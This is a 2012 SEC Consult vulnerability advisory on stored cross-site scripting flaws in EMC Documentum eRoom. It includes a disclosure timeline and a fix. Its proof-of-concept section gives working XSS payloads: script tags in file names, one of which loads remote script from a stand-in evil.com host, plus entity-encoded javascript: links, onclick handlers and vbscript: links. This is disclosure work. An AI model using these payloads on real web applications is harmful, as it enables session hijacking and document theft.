Multiple permanent cross-site scripting vulnerabilities

SEC Consult Vulnerability Lab Security Advisory < 20120315-0 >

=======================================================================

title: Multiple permanent cross-site scripting vulnerabilities

product: EMC Documentum eRoom

vulnerable version: 7.33.498.98

fixed version: 7.4.4

impact: high

homepage: www.emc.com/products/detail/software2/eroom.htm

found: 2011-05-05

by: F. Lukavsky, B. Schildendorfer

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

"EMC Documentum eRoom is easy-to-use online team collaboration software that

enables distributed teams to work together more efficiently. With Documentum

eRoom, teams around the world can accelerate document collaboration and group

activities, improve the development and delivery of products and services,

optimize collaborative business processes, improve innovation, and streamline

decision-making."

 

www.emc.com/products/detail/software2/eroom.htm

 

 

Vulnerability overview/description:

-----------------------------------

Documentum eRoom suffers from multiple permanent cross-site scripting

vulnerabilities, which allow an attacker to steal other user's sessions,

to impersonate other users and to gain unauthorized access to documents

hosted in eRooms. A JavaScript worm could be utilized to crawl an eRoom and

gather all available documents.

 

There are many parameters which are not properly sanitized and thus

vulnerable to XSS.

 

 

Proof of concept:

-----------------

1) Permanent Cross-Site Scripting within file names

The extension of files uploaded to Documentum eRoom are not sanitized. The

following file name would lead to execution of script code as soon as the

file is viewed (i.e. in the search results or the directory view)

file."><script>alert(1)</script>
."><script src="http://evil&#x26;#x2e;com/evil%2ejs"></script>
."><script src="/eRoomReq/Files/facility/eRoom/0_f000/test%2etxt"></script>

 

2) Permanent Cross-Site Scripting within the personal information

Users can change their personal information. By editing the field

"organization" it is possible to store a malicious JavaScript payload

(e.g., <script>alert(1)</script>).

The payload gets executed every time a user visits a part of the website

responsible for alerting users about changes in the eRoom (i.e., "Choose

Members" for eRooms).

 

3) Cross-Site Scripting within Links

Via the import function it is possible to add formatted text to database

fields even when the eRoom Plugin is not utilized.

The following formatted text will create links that execute JavaScript code

once clicked:

 

"<div class=""user""><a href=""&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)"">test</a></div>"
"<div class=""user""><a onclick=""alert(1)"">test</a></div>"

 

4) Unhandled protocol handlers in links

Although it is not possible to create links with the function "create link"

that execute JavaScript code via the protocol handler "javascript:", the

protocol handler "vbscript" is allowed and would execute VBScript, for example

in IE (e.g., "vbscript:alert(1)", "callto:+1900[premium-rate number]", etc.).

 

 

Vulnerable / tested versions:

-----------------------------

Documentum eRoom version 7.33.498.98

 

 

Vendor contact timeline:

------------------------

2011-11-22: Contacting vendor through security_alert@emc.com

2011-11-23: Vendor response, issue is being forwarded to the

appropriate product development team for review and

confirmation

2011-11-28: Vendor response, issue has been reviewed

affected version is not supported anymore

current version not affected by #1 and #3

additional information required for #2 and #4

2011-11-29: Providing additional information for #2 and #4

2011-11-30: Vendor cannot reproduce #2 and #4, asks for additional

information

2012-01-12: Call with vendor to clarify remaining issues.

2012-01-27: Vendor requests additional information regarding the test

environment in order to reproduce vulnerabilities #2 and #4

2012-03-13: EMC releases patch

2012-03-15: Public release of SEC Consult advisory

 

 

Solution:

---------

According to the vendor, these issues have been fixed in version 7.4.4 of

Documentum eRoom. Upgrade to the new release.

 

 

Workaround:

-----------

Restrict access to the software as much as possible. Only allow trusted

IP addresses and users in order to minimise attack surface. Do not host

confidential information in Documentum eRoom.

 

 

Advisory URL:

-------------

www.sec-consult.com/vulnerability-lab/

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

 

Office Vienna

Mooslackengasse 17

A-1190 Vienna

Austria

 

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com

www.sec-consult.com

 

EOF F. Lukavsky / @2012